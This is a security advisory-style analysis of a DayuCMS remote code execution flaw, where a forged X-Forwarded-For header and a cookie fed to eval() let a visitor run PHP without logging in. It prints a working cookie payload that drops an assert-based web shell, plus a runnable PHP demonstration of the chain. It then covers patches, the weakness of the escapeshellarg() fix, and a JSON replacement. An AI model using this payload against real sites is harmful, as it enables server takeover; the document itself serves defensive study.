Catalog

1. Vulnerability Description
2. Vulnerability Trigger Condition
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
5. Defense Methods
6. Defensive Thinking
1. Vulnerability Description

In DayuCMS, /pay/order.php reads a cookie whose name is derived from the client IP and hands its value to string2array() in /include/global.func.php, which builds the array by eval()-ing the string. Because the IP is taken from a forgeable request header, a foreground visitor (front-end, no back-end login) can predict the cookie name and supply arbitrary PHP statements in the cookie value, which gives remote code execution.

Relevant links:
http://joychou.org/index.php/web/dayucms-1-526-foreground-remote-code-execution.html
http://www.wooyun.org/bugs/wooyun-2014-087518
2. Vulnerability Trigger Condition

1. The IP constant can be spoofed through the X-Forwarded-For header, so the cookie key can be pinned to a fixed value, here b98b87d11653f2da.
2. First visit /pay/order.php to obtain the cookie prefix, then splice it with the cookie key; the resulting cookie name is cbpcmsntnab98b87d11653f2da. On the next request to /pay/order.php, get_cookie() no longer returns false, so string2array() is called with the cookie value.
3. Set the X-Forwarded-For header to 0.0.0.0.
4. Send a cookie with that name and the value
   1;fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))
   The two base64 blobs decode to JoyChou.php and a one-line assert($_POST[x]) web shell. Bare words are used in place of quoted strings so the cookie needs no quote characters: PHP 5 and 7 treat an undefined constant as a string equal to its own name (with a notice that the @ in front of eval() hides), whereas PHP 8 throws an Error for it.
5. The code executes: the statement appended after the assignment writes the web shell to JoyChou.php.
3. Vulnerability Impact Range
4. Vulnerability Code Analysis
/include/global.func.php
// string conversion to array
function string2array($str) {
    if (disablefunc('eval')) exit('function eval is disabled and may not work properly with this system!');
    if ($str == '') return array();
    if (is_array($str)) return $str;   // 2011-09-13: if it is already an array, return it directly
    // assign the string to an array directly using eval
    @eval("\$array = $str;");
    return $array;
}
Tracing back to the caller of string2array():
/pay/order.php
$payobj = new pay();
$action = isset($action) ? $action : 'step1';
// ...
$cookiekey    = dayucms_md5('productarray' . IP);   // key depends only on the IP constant
$productarray = string2array(get_cookie($cookiekey));
The IP constant is declared in /include/common.inc.php:
define('IP', getip());
include/global.func.php
// get IP address
function getip() {
    $ip = 'unknown IP';
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return is_ip($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : $ip;
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // IP can be forged using X-Forwarded-For (Client-IP above is a request header too, and just as forgeable)
        return is_ip($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $ip;
    } else {
        return is_ip($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : $ip;
    }
}
/include/global.func.php
function get_cookie($var) {
    $var = cookie_pre . $var;
    return isset($_COOKIE[$var]) ? $_COOKIE[$var] : false;
}
The normal use of string2array() is:

$arr = string2array('array("hello" => "world")');   // at this point $arr is an array

However, if the parameter passed to string2array() is 1;echo 222, then because eval() executes any number of statements separated by semicolons, the evaluated code becomes @eval("\$array = 1;echo 222;"); the assignment runs, and so does the attacker's echo. Anything the cookie contains after the first semicolon is executed as PHP.

[Figure: result of code execution]
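To see the whole chain from section 2 and the three snippets above run end to end offline, here is an added example, not code from the DayuCMS source or from the original post. getip(), get_cookie() and string2array() are transcribed from the snippets; dayucms_md5() and is_ip() are stand-ins, because their real bodies are not on the page; the cookie prefix cbpcmsntna and the payload are the ones from the trigger steps; and $_SERVER and $_COOKIE are filled by hand in place of a real HTTP request. It needs PHP 7.x, since the quote-free payload relies on bare words being read as undefined constants, which PHP 8 turns into an Error.

```php
<?php
// Added example, not DayuCMS code: the eval() chain in one CLI script.
// getip(), get_cookie() and string2array() are transcribed from the page;
// dayucms_md5() and is_ip() are stand-ins (ASSUMPTION: their real bodies are
// not on the page); $_SERVER and $_COOKIE are filled by hand in place of a
// real request. Run with PHP 7.x: php chain.php

define('COOKIE_PRE', 'cbpcmsntna');   // prefix seen in section 2 (ASSUMPTION: a constant of this name)

function dayucms_md5($s) {            // ASSUMPTION: stand-in, the real helper is not shown
    return md5($s);
}

function is_ip($ip) {                 // ASSUMPTION: stand-in for the original is_ip()
    return filter_var($ip, FILTER_VALIDATE_IP) !== false;
}

function getip() {
    $ip = 'unknown IP';
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        return is_ip($_SERVER['HTTP_CLIENT_IP']) ? $_SERVER['HTTP_CLIENT_IP'] : $ip;
    } elseif (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        // a request header, so fully attacker-controlled, and preferred over REMOTE_ADDR
        return is_ip($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $ip;
    } else {
        return is_ip($_SERVER['REMOTE_ADDR']) ? $_SERVER['REMOTE_ADDR'] : $ip;
    }
}

function get_cookie($var) {
    $var = COOKIE_PRE . $var;
    return isset($_COOKIE[$var]) ? $_COOKIE[$var] : false;
}

function string2array($str) {
    if ($str == '') return array();
    if (is_array($str)) return $str;
    @eval("\$array = $str;");          // the sink: $str is spliced straight into PHP source
    return $array;
}

// ---- constructed request: what the attacker sends ---------------------------
$_SERVER['REMOTE_ADDR']          = '203.0.113.7';  // real peer address, never consulted
$_SERVER['HTTP_X_FORWARDED_FOR'] = '0.0.0.0';      // spoofed, pins IP and therefore the key
define('IP', getip());

$cookiekey = dayucms_md5('productarray' . IP);     // the attacker can compute this as well
$name      = COOKIE_PRE . $cookiekey;

// Same payload shape as section 2: "1" satisfies the assignment, then a second
// statement writes the shell. Sm95Q2hvdS5waHA decodes to "JoyChou.php", the other
// blob to "<?php assert($_POST[x]); ?>" (with newlines); bare words avoid quotes.
$_COOKIE[$name] = '1;fputs(fopen(base64_decode(Sm95Q2hvdS5waHA),w),'
                . 'base64_decode(PD9waHAKYXNzZXJ0KAokX1BPU1RbeF0KKTsKPz4))';

$productarray = string2array(get_cookie($cookiekey));

var_dump($productarray);                         // int(1): the assignment part still "works"
var_dump(file_exists('JoyChou.php'));            // bool(true): the injected statement ran
echo file_get_contents('JoyChou.php'), PHP_EOL;  // the dropped web shell
unlink('JoyChou.php');                           // clean up after the demonstration
```

Note that the script writes JoyChou.php into the current directory and removes it again; run it in a scratch directory. The return value int(1) is the point to notice for detection: the caller never checks that string2array() actually produced an array, so nothing downstream notices that a scalar came back.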
5. Defense Methods
/include/global.func.php
// string conversion to array
function string2array($str) {
    if (disablefunc('eval')) exit('function eval is disabled and may not work properly with this system!');
    if ($str == '') return array();
    if (is_array($str)) return $str;   // 2011-09-13: if it is already an array, return it directly
    /**/$str = escapeshellarg($str);
    /**/@eval("\$array = $str;");
    return $array;
}

Caveat on this patch: escapeshellarg() is a shell quoting function, not a PHP one. On POSIX systems it wraps the whole value in single quotes, so the evaluated statement becomes $array = '...'; and string2array() now returns a string for every input, never an array. It stops the injection, but it also breaks the legitimate array("...") case, and a cookie value containing a single quote yields '\'' sequences that are shell syntax rather than PHP syntax; PHP 7 and later raise a ParseError from eval() on them, which the @ operator does not suppress. The durable fix is to stop passing cookie data through eval() at all and to carry the array in a data format such as JSON that is parsed rather than executed.
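The three behaviours side by side, as an added example that is not DayuCMS code: the original eval() sink, the escapeshellarg() patch from the section above, and an eval-free replacement that parses JSON instead of executing PHP source. The JSON version assumes the counterpart array2string() would be changed to emit json_encode($array); that side is not on the page. disablefunc() is omitted because its body is not shown.

```php
<?php
// Added example, not DayuCMS code: three versions of string2array() side by
// side. string2array_eval() is the original sink, string2array_escaped() is the
// escapeshellarg() patch, and string2array_json() is an eval-free replacement
// (ASSUMPTION: array2string() would then emit json_encode($array) rather than
// PHP source; that side is not on the page). Run with: php string2array.php

function string2array_eval($str) {
    if ($str == '') return array();
    if (is_array($str)) return $str;
    @eval("\$array = $str;");           // executes whatever the cookie contains
    return $array;
}

function string2array_escaped($str) {
    if ($str == '') return array();
    if (is_array($str)) return $str;
    $str = escapeshellarg($str);        // POSIX: wraps in single quotes, ' becomes '\''
    @eval("\$array = $str;");           // now a string literal assignment, never an array
    return $array;
}

function string2array_json($str) {
    if (is_array($str)) return $str;
    if (!is_string($str) || $str === '') return array();
    $array = json_decode($str, true, 16);        // parsed, not executed; bounded nesting depth
    return is_array($array) ? $array : array();  // scalars and invalid JSON are discarded
}

$benign   = 'array("hello" => "world")';
$injected = '1;echo "injected statement ran\n"';

echo "-- original eval version --\n";
var_dump(string2array_eval($benign));      // array(1) { ["hello"]=> string(5) "world" }
var_dump(string2array_eval($injected));    // prints the injected line, returns int(1)

echo "-- escapeshellarg patch --\n";
var_dump(string2array_escaped($benign));   // string(25) "array("hello" => "world")": not an array any more
var_dump(string2array_escaped($injected)); // injection neutralised, but still a string, not an array
var_dump(escapeshellarg("it's"));          // string(9) "'it'\''s'": shell quoting that PHP cannot eval

echo "-- JSON version --\n";
var_dump(string2array_json('{"hello":"world"}'));   // array(1) { ["hello"]=> string(5) "world" }
var_dump(string2array_json('1;echo "x"'));          // array(0) {}: not JSON at all
var_dump(string2array_json('"a bare string"'));     // array(0) {}: valid JSON but not an array
```

The last escapeshellarg() line shows why the patch is fragile: a value with an embedded single quote produces shell-style '\'' quoting, and feeding that to eval() under PHP 7 throws a ParseError instead of returning. The JSON version has no such edge: malformed or non-array input is rejected by type, and json_decode() never executes anything.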
6. Defensive Thinking
0x1: Preventing PHP command injection attacks

The eval() bug above is code injection rather than OS command injection, but the same discipline applies to both:

1. Try not to execute external applications or commands at all.
2. Use a custom function or library to implement the functionality instead of shelling out to an external application or command.
3. Validate the contents of every parameter before it reaches functions such as system() or eval().
4. Use escapeshellarg() on parameters that must be passed to a shell. On POSIX systems it wraps the argument in single quotes and turns every embedded single quote into '\'' (close quote, escaped quote, reopen quote), so characters such as double quotes and semicolons inside the argument are never interpreted by the shell and cannot terminate the current command. As the PHP manual puts it, escapeshellarg() adds single quotes around a string and quotes/escapes any existing single quotes, so the string can be passed directly to a shell function and treated as a single safe argument; it should be used on any parameter that comes from user input. Shell functions include exec(), system() and the backtick execution operator.
5. Restrict the executable file path with safe_mode_exec_dir. Set safe_mode = On in php.ini, put the permitted programs in a directory and point safe_mode_exec_dir at it; then an external program can only run if it lives in that directory, otherwise execution fails. Note that safe mode was deprecated in PHP 5.3 and removed in PHP 5.4, so this control is unavailable on any current PHP version; disable_functions, open_basedir and OS-level sandboxing of the PHP process are the replacements.
Relevant links:
http://php.net/manual/zh/function.escapeshellarg.php
http://www.rising.com.cn/Newsletter/news/2012-06-27/11810.html
Copyright (c) Little5ann All rights reserved
Dayucms 1.525/include/global.func.php Foreground arbitrary Code execution